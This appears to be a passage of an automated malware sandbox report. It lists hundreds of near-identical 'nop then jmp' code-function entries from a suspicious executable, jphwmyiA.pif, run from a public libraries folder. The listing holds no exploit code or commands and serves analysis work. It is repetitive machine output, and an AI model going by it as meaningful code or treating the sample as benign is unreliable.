                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2503BC81h10_2_2503B9D8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2503F0A1h10_2_2503EDF8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2503DAE9h10_2_2503D840
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2503DF41h10_2_2503DC98
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2503E399h10_2_2503E0F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2503FDA9h10_2_2503FB00
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2503185Dh10_2_2503178B
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2503D239h10_2_2503CF90
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2503D691h10_2_2503D3E8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2503C0D9h10_2_2503BE30
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2503F4F9h10_2_2503F250
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2503C531h10_2_2503C288
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2503F951h10_2_2503F6A8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2503C989h10_2_2503C6E0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250468FDh10_2_250465C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 25042151h10_2_25041EA8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 25047DC0h10_2_25047AF0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 25045FB9h10_2_25045D10
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 25043BC1h10_2_25043918
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504E5EEh10_2_2504E320
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504C5FEh10_2_2504C330
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504A60Eh10_2_2504A340
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 25040FF1h10_2_25040D48
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504F82Eh10_2_2504F560
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 25046411h10_2_25046168
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504701Ah10_2_25046F69
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504701Ah10_2_25046F70
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 25044019h10_2_25043D70
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504D83Eh10_2_2504D570
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504B84Eh10_2_2504B580
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov esp, ebp10_2_25049B8A
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 25041449h10_2_250411A0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504EA7Eh10_2_2504E7B0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504CA8Eh10_2_2504C7C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 25044471h10_2_250441C8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504AA9Eh10_2_2504A7D0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504FCBEh10_2_2504F9F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250418A1h10_2_250415F8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504DCCEh10_2_2504DA00
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504BCDEh10_2_2504BA10
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250448C9h10_2_25044620
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504EF0Eh10_2_2504EC40
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250402E9h10_2_25040040
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 25041CF9h10_2_25041A50
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504CF1Eh10_2_2504CC50
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504AF2Eh10_2_2504AC60
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 25045709h10_2_25045460
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 25043311h10_2_25043068
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 25044D21h10_2_25044A78
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504E15Eh10_2_2504DE90
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 25040741h10_2_25040498
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504C16Eh10_2_2504BEA0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504A17Eh10_2_25049EB0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 25045B61h10_2_250458B8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 25043769h10_2_250434C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504517Bh10_2_25044ED0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504F39Eh10_2_2504F0D0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504D3AEh10_2_2504D0E0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504B3BEh10_2_2504B0F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 25040B99h10_2_250408F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B4C77h10_2_250B4908
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B52A0h10_2_250B4FA8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B8C00h10_2_250B8908
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B60F8h10_2_250B5E00
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BF9F8h10_2_250BF700
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B2BE6h10_2_250B2918
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BE210h10_2_250BDF18
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BB708h10_2_250BB410
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B0BF6h10_2_250B0928
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B9F20h10_2_250B9C28
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B7418h10_2_250B7120
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B3507h10_2_250B3238
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B5C30h10_2_250B5938
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BF530h10_2_250BF238
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BCA28h10_2_250BC730
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B1516h10_2_250B1248
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BB240h10_2_250BAF48
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B030Eh10_2_250B0040
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B8738h10_2_250B8440
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B3E26h10_2_250B3B58
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B6F50h10_2_250B6C58
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BDD48h10_2_250BDA50
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B1E36h10_2_250B1B68
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BC560h10_2_250BC268
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B9A58h10_2_250B9760
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B4746h10_2_250B4478
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B8270h10_2_250B7F78
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B5768h10_2_250B5470
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BF069h10_2_250BED70
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B2756h10_2_250B2488
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BD880h10_2_250BD588
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BAD78h10_2_250BAA80
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B9590h10_2_250B9298
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B6A88h10_2_250B6790
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B3076h10_2_250B2DA8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BEBA0h10_2_250BE8A8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BC098h10_2_250BBDA0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B1086h10_2_250B0DB8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BA8B0h10_2_250BA5B8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B7DA8h10_2_250B7AB0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B3996h10_2_250B36C8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B65C0h10_2_250B62C8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BD3B8h10_2_250BD0C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B19A6h10_2_250B16D8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BBBD0h10_2_250BB8D8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B0777h10_2_250B04D0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B90C8h10_2_250B8DD0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B42B6h10_2_250B3FE8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B78E0h10_2_250B75E8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BE6D8h10_2_250BE3E0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B22C6h10_2_250B1FF8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BCEF0h10_2_250BCBF8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BA3E8h10_2_250BA0F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250E0CC8h10_2_250E09D0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov ecx, 000003E8h10_2_250EFDF0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250E0800h10_2_250E0508
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov ecx, 000003E8h10_2_250EFDE0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250E0338h10_2_250E0040
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_250FFDEE
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_250FFAC9
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_250FFAD8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_252531D0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]10_2_2525EF70
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]10_2_2525EF78
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_252531C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then push 00000000h10_2_25B9E28E
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h15_2_1A40DC80
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov ecx, dword ptr [ebp-40h]15_2_1EEBFD28
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 1EEBF2B5h15_2_1EEBF0C8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 1EEBFC3Fh15_2_1EEBF0C8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 1EEBE0C5h15_2_1EEBDF07
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h15_2_1EEBEC1B
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h15_2_1EEBEDFB
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov ecx, dword ptr [ebp-40h]15_2_1EEBFD21
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h15_2_1EEBE5E8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 1EEBE0C5h15_2_1EEBE114
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007185Dh15_2_20071440
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007C0D9h15_2_2007BE30
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200710E9h15_2_20070E38
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007DAE9h15_2_2007D840
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007DF41h15_2_2007DC98
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007E399h15_2_2007E0F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007E7F1h15_2_2007E548
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007B829h15_2_2007B580
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007EC49h15_2_2007E9A0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007BC81h15_2_2007B9D8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007F0A1h15_2_2007EDF8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007F4F9h15_2_2007F250
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007C531h15_2_2007C288
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007F951h15_2_2007F6A8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007C989h15_2_2007C6E0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007FDA9h15_2_2007FB00
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007CDE1h15_2_2007CB38
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007185Dh15_2_2007178B
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007D239h15_2_2007CF90
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007D691h15_2_2007D3E8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008A17Eh15_2_20089EB0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20087DC0h15_2_20087AF0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200868FDh15_2_200865C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008DCCEh15_2_2008DA00
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200848C9h15_2_20084620
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008EF0Eh15_2_2008EC40
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200802E9h15_2_20080040
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20081CF9h15_2_20081A50
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008CF1Eh15_2_2008CC50
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20083311h15_2_20083068
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008AF2Eh15_2_2008AC60
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20085709h15_2_20085460
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20084D21h15_2_20084A78
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20080741h15_2_20080498
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008E15Eh15_2_2008DE90
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20082151h15_2_20081EA8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008C16Eh15_2_2008BEA0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20085B61h15_2_200858B8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20083769h15_2_200834C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008517Bh15_2_20084ED0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008F39Eh15_2_2008F0D0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008D3AEh15_2_2008D0E0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008B3BEh15_2_2008B0F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20080B99h15_2_200808F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20083BC1h15_2_20083918
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20085FB9h15_2_20085D10
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008E5EEh15_2_2008E320
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008C5FEh15_2_2008C330
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20080FF1h15_2_20080D48
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008A60Eh15_2_2008A340
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20086411h15_2_20086168
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008701Ah15_2_20086F69
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008F82Eh15_2_2008F560
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008701Ah15_2_20086F70
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20084019h15_2_20083D70
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008D83Eh15_2_2008D570
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov esp, ebp15_2_20089B8A
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008B84Eh15_2_2008B580
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20081449h15_2_200811A0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008EA7Eh15_2_2008E7B0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20084471h15_2_200841C8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008CA8Eh15_2_2008C7C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008AA9Eh15_2_2008A7D0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200818A1h15_2_200815F8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008FCBEh15_2_2008F9F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F4C77h15_2_200F4908
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FE210h15_2_200FDF18
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F52A0h15_2_200F4FA8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F22C6h15_2_200F1FF8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F8C00h15_2_200F8908
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F60F8h15_2_200F5E00
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FF9F8h15_2_200FF700
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F2BE6h15_2_200F2918
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FB708h15_2_200FB410
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F0BF6h15_2_200F0928
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F9F20h15_2_200F9C28
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F7418h15_2_200F7120
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F3507h15_2_200F3238
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F5C30h15_2_200F5938
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FF530h15_2_200FF238
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FCA28h15_2_200FC730
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F1516h15_2_200F1248
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FB240h15_2_200FAF48
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F030Eh15_2_200F0040
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F8738h15_2_200F8440
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F3E26h15_2_200F3B58
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F6F50h15_2_200F6C58
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FDD48h15_2_200FDA50
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F1E36h15_2_200F1B68
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FC560h15_2_200FC268
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F9A58h15_2_200F9760
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F4746h15_2_200F4478
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F8270h15_2_200F7F78
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F5768h15_2_200F5470
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FF069h15_2_200FED70
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F2756h15_2_200F2488
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FD880h15_2_200FD588
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FAD78h15_2_200FAA80
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F9590h15_2_200F9298
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F6A88h15_2_200F6790
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F3076h15_2_200F2DA8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FEBA0h15_2_200FE8A8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FC098h15_2_200FBDA0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F1086h15_2_200F0DB8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FA8B0h15_2_200FA5B8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F7DA8h15_2_200F7AB0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F3996h15_2_200F36C8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F65C0h15_2_200F62C8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FD3B8h15_2_200FD0C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F19A6h15_2_200F16D8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FBBD0h15_2_200FB8D8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F0777h15_2_200F04D0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F90C8h15_2_200F8DD0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F42B6h15_2_200F3FE8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F78E0h15_2_200F75E8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FE6D8h15_2_200FE3E0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FCEF0h15_2_200FCBF8
